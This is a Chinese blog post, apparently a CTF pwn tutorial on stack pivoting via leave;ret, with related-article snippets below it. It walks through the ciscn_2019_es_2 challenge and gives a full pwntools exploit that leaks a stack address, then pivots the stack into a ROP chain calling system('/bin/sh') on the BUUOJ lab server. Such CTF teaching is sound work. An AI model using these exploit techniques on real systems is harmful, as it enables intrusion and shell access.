栈迁移基础

最新推荐文章于 2023-04-20 22:47:33 发布
最新推荐文章于 2023-04-20 22:47:33 发布
阅读量200 收藏
点赞数
文章标签: 学习方法 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Civit_/article/details/129802471
版权

栈迁移在各种学习平台中并没有特意去作为一个专题来讲,所以本来我也是没有太注重这种溢出的姿势,但是参加过几次比赛后发现几乎不会给你简单的溢出特别多字节的题,基本上都会用到栈迁移,所以要着重学习一下。
​前提是需要会栈溢出漏洞,详见——>栈溢出漏洞

栈迁移简介

​ 栈迁移就是控制E/RBP、E/RSP寄存器,让栈帧指向一段我们可以控制的内存,从而实现程序执行流的目的。
​ 栈溢出攻击时,一个条件就是栈上有充分的空间可以布局。当溢出空间不够时,就需要栈迁移来解决了。

栈迁移利用原理(以32位为例)

​ leave和ret的作用:

  • ​ leave指令做出了两步操作mov ebp,esp和pop ebp。
    • mov ebp,esp:将ebp的值赋给esp,这样esp和ebp就会指向同一块内存。
    • pop ebp:将esp指向的值赋给ebp,同时esp保存的地址增加四个字节(64位增加八个字节),就是指向上一个栈块。
  • ​ ret指令相当于pop eip
    • pop eip:将当前esp中的值赋给eip,这样下一步就会去执行更新后的eip指向的内容了,同时esp指向上一个栈块。
      ​ 在指令集中,每次call之后都会执行leave;ret来退出call指令,以继续往下执行,因此我们可以利用这个指令来进行栈迁移,控制程序执行流。
      ​ 要实现栈迁移,需要进行两次写入,第一次往可读可写段写入rop链,第二次栈溢出,将esp指向上次写入的rop链所在的段地址,还需要两次leave;ret,一次是栈溢出修改ret地址,一次是完成迁移。

例题

ciscn_2019_es_2(大家都用的这个)

32位,IDA看看
在这里插入图片描述
发现存在栈溢出,但是只溢出了0x30-0x28=0x8字节,不够我们直接构造rop链,就要用到栈溢出了,我们gdb调试一下
在这里插入图片描述
在这里插入图片描述
发现ebp寄存器在0xffffd0a8,栈上ebp为0xffffd0b8,即oldebp,与缓冲区s开头的距离为0x38
攻击思路:

  • 利用printf泄露oldebp地址
  • 在s中写入rop链
  • 将ebp覆盖为oldebp-0x38,即再次回到缓冲区开头,从而执行rop链
    exp:
from pwn import *

io=remote('node4.buuoj.cn',25126)

elf=ELF('./ciscn_2019_es_2')

sys_addr=0x8048400
leave_ret=0x080484b8

io.recvuntil("Welcome, my friend. What's your name?")

payload=b'a'*0x24+b'bbbb'
io.send(payload)			#如果用sendline()的话会多发送一个字节
io.recvuntil('bbbb')
old_ebp=u32(io.recv(4))		#接收old_ebp地址

log.success("old_ebp="+hex(old_ebp))

payload2=b'aaaa'+p32(sys_addr)+b'bbbb'+p32(old_ebp-0x38+0x10)+b'/bin/sh\x00'
payload2=payload2.ljust(0x28,b'c')

payload2+=p32(old_ebp-0x38)+p32(leave_ret)

io.sendline(payload2)
io.interactive()

栈迁移练习题——>栈迁移例题

Lxxxt_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
基础到高级:AI大模型开发的技术
光剑书架上的书
01-17 1268
人工智能(AI)技术在近年来取得了突飞猛进的发展,其中大模型(Large Language Models,LLMs)的出现更是掀起了新一轮的技术革命。从OpenAI的GPT系列到Google的BERT,再到更近期的Claude和PaLM,这些大模型展现出了惊人的语言理解和生成能力,正在重塑我们与技术交互的方式。然而,开发如此复杂的AI系统并非易事,它需要一整套完善的技术支持。本文旨在全面剖析AI大模型开发的技术,从基础理论到实际应用,为读者提供一个清晰而深入的认识。
[PWN]——迁移及部分基础
最新发布
ysy___ysy的博客
04-18 1281
由高到低,自顶向下增长,ebp指向底 【减(push)即指针向高移,加(pop)即指针向低移】。溢出能使我们覆盖上某些区域的值,甚至是当前函数的返回地址 ret;一旦 ret 覆盖为某个奇怪的值,例如 0xdeadbeaf,当函数结束恢复现场,即 eip 指向 ret 时,程序将会跳转到内存中的 0xdeadbeaf 处。此时,内核会立即告诉我们“SIGSEV”,即常见的段错误(Segment Fault)。注意:函数传参时从右往左。
pwn--迁移
weixin_44642009的博客
04-17 979
迁移–ROP 本次实验我们使用lab4的可执行文件。 在开始之前我们需要明确一些问题以及需要注意的地方,以下我会讲到,这也是在实验过程中我碰到的一些情况和解题关键: 为什么使用迁移? 由上图可知,程序开辟的堆大小是0x50字节,而read函数输入可以输入0x60字节,明显存在溢出的可能,不过可输入的字节数不是足够多,空间较小,不足以使我们填入足够的ROP链,所以我们需要迁移。 ...
PWN入门之迁移
weixin_44681716的博客
04-24 2965
实验目的 在我们仅仅只能够控制ebp的情况下,我们怎么才能够控制eip去拿到我们的shell?使用迁移方法便能解决这个问题。在这里用lab4的文件来举例。 实验文件 链接:https://pan.baidu.com/s/1CW0eZM-yFNZfOfqlLnxqCw 提取码:tmo3 实验步骤 首先来介绍一下迁移是什么? 以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进...
从一道简单的pwn题 认识 转移
qq_41071646的博客
04-27 511
这个题 好像是 bugku的 但是好像这个题 给换了 这个是 64位的程序 这个题 难搞点就是 空间不够 可以看的出来 我们s的地方是 rbp-0x10的地方 那么 返回地址 应该就是 rbp-0x18的地址 如果我们想把这个搞定 那么 要考虑一下 转移 转移 有很多高级的用法 这里 就浅显的说一些简单的 转移 转移 其实就是利用的是这两个...
ctf pwn 题目
m0_64195960的博客
04-11 1391
2022年3月21迁移 这道题是迁移 1)先checksec一下 嗯哼哼,貌似影响不大 2)丢在ida里瞅 1、main() 没啥用再看看其它的 2、vul() 第一个read读进去的东西,可以被printf呸!吐出来! 芜湖!看到了第二个read可以溢出,但是可以溢出的空间太少! ————————那么就要来到了,刚学习迁移—————————— 3、hack() 芜湖看到system函数了,那我们就可以获得system的返回地址从而调用.
PWN——迁移
L2329794714的博客
08-29 1554
简单一句话就是控制esp指针的指向。实现指令:eave;ret 指令Leave等价于:其实就是在做恢复上一次空间的操作。但这过程中能恢复到上次的的关键数据为当前ebp指向地址上值(oldebp),当我们通过溢出覆盖原本的oldebp值时,然后将leave;ret 程序段地址放在返回地址上,那么就可以实现将esp迁移至我们想要的地方(取决于oldebp上的覆盖的地址,注意这里会抬高4字节,64位抬8字节)。第一次leave第一次ret:因为esp还是指向leave;.........
软硬件技术整体迁移策略
06-10
2. 并行迁移:在原有技术基础上,同时开发和测试新技术,直到新技术完全替代原有技术。这种策略可以提高迁移速度,但需要付出更多的人力和资源。 3. 混合运行:在新技术和原有技术之间建立桥梁,实现...
最全面的微服务技术——基础
qq_53263107的博客
11-07 571
分布式架构:根据业务功能对系统做拆分,每个业务功能模块作为独立项目开发,称为一个服务。 优点:降低服务耦合,有利于服务升级和拓展缺点:服务调用关系错综复杂分布式架构虽然降低了服务耦合,但是服务拆分时也有很多问题需要思考:微服务的架构特征: 微服务的上述特性其实是在给分布式架构制定一个标准,进一步降低服务之间的耦合度,提供服务的独立性和灵活性。做到高内聚,低耦合。
PWN 迁移入门解说 [Black Watch 入群题]PWN
weixin_45441024的博客
11-30 664
PWN迁移解说 适用情况: 1.溢出的长度不足以让我们把ROP写进去 2.程序开启了的不可执行保护 基础知识: 我们迁移的目的就是将我们在上不可执行的链子转移到data段或者bss段上面 ,这里就需要用到leave;ret了,在这一类的题型中我们是构造并使用两次leave,来将ebp转移到我们构造的后门的起始位置。 寻找leave;ret需要用到ROPgadget这个工具 $ ROPgadget --binary '/home/pwn/Desktop/bbys_tu_2016' --only
代码迁移工具:gpt-migrate
02-05
1. **智能分析**:gpt-migrate具备强大的代码分析能力,能理解源代码的结构和逻辑,识别关键元素如函数、类、模块等,为迁移提供基础。 2. **自动转换**:根据分析结果,gpt-migrate自动执行代码转换,将源代码转换...
pwn】 关于迁移
wintersun的地带
05-19 3159
[pwn] 关于迁移在我们仅仅只能够控制ebp的情况下,我们怎么才能够控制eip去拿到我们的shell呢。以下为科普以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进行一系列操作: push eip+4;push ebp;mov ebp,esp;来保护现场,避免执行完函数后堆不平衡以及找不到之前的入口地址。执行完函数后会进行一系列操作来还原现场leave;ret; 这
PWN题型之迁移
swedsn
07-30 1715
文章目录前言0x1 :基本知识:0x2 :利用思路 :0x3 :实例讲解 前言 0x1 :基本知识: (1)存在溢出,但是溢出的长度不够,你输入的内容最多只能覆盖掉ret返回地址,而之后的rop链无法构造。 (2)就是之前的.bas 0x2 :利用思路 : 0x3 :实例讲解 ...
Linux PWN技巧之迁移
小小鱼的博客
02-16 1823
简介 迁移简单将就是控制EBP/RBP、ESP/RSP寄存器,让帧指向一段我们可以控制的内存,从而实现控制上执行内容、控制程序执行流程的目的。 迁移一般会将帧指向bss段(其他可读写内存段也可以),这种技巧是为了解决上空间太小,不够写入完整payload的情况。比如有个程序存在溢出的漏洞,但溢出的长度不够,只够覆盖到返回地址,不能读入完整的rop链,这种情况就可能要用到迁移的技巧了 利用介绍 以32位程序为例,描述一下迁移的核心思想。 首先要理解leave和ret汇编指令的作用: lea
[Black Watch 入群题]PWN-迁移
个人笔记
04-20 395
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出空间只有0x20-0x18=8字节无法构造rop,所以需要利用迁移技术,迁移到bss上构造rop。bss布局:(左边是第一泄露Libc构造帧,右边是第二次重写获取shell的帧)改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要。迁移操作:构造好中ebp新位置。思路:ret2shellcode。迁移关键指令:leave。
CTF-PWN迁移
m0_53921051的博客
04-05 860
帧介绍 C语言函数调用帧_大佬菜菜带带的博客-CSDN博客 迁移背景 在溢出构造rop链时,有时我们会遇到构造空间不够的情况。比如我们需要构造0x30字节的数据,而read()只能读入0x28字节。但是我们可以控制ebp及ret的值,此时可以利用迁移方法拓展空间。 迁移条件 能够控制rbp及ret的值。 拥有一块可执行的内存,并且可以连续两次控制该内存。 迁移原理 在函数调用完返回时,会执行leave,ret两条汇编指令。 leave: mov esp ebp; pop
32位以及64位迁移的具体分析与学习
蚁景网安学院
03-16 1730
前言这次来学习迁移技术吧,全片构成为先了解原理,然后再分别以 32位程序及64位程序以图文的形式来具体学习!原理迁移正如它所描述的,该技巧就是劫持指针指向攻击者所能控制的内存处,...
pwn刷题num43---迁移
tbsqigongzi的博客
05-03 677
BUUCTF-PWN-ciscn_2019_es_2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在溢出 开启NX保护-----堆不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 可以看到read函数读入0x30字节给s,可是s是0x28字节大小,只相差0x8字节,只能覆盖ebp和函数返回地址,而程序中无直接getshell的函数,程序
[PWN] 迁移 ciscn_2019_es_2
LDX的博客
11-28 347
迁移 基础题目 理解 ciscn_2019_es_2
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lxxxt_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值